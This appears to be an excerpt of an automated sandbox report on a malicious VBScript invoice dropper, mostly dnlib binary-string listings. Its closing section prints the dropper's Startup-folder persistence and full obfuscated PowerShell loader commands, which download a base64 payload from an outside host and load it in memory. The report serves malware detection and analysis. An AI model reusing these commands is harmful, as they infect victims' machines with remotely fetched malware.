Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb5 source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000008.00000002.1732143246.000001B9E00F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mocidade.vbs");IFileSystem3.CopyFile("C:\Windows\system32\FAKTURA-pdf-466366332.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mocidade.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR", "0", "false")
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"Jump to behavior
Suspicious powershell command line found
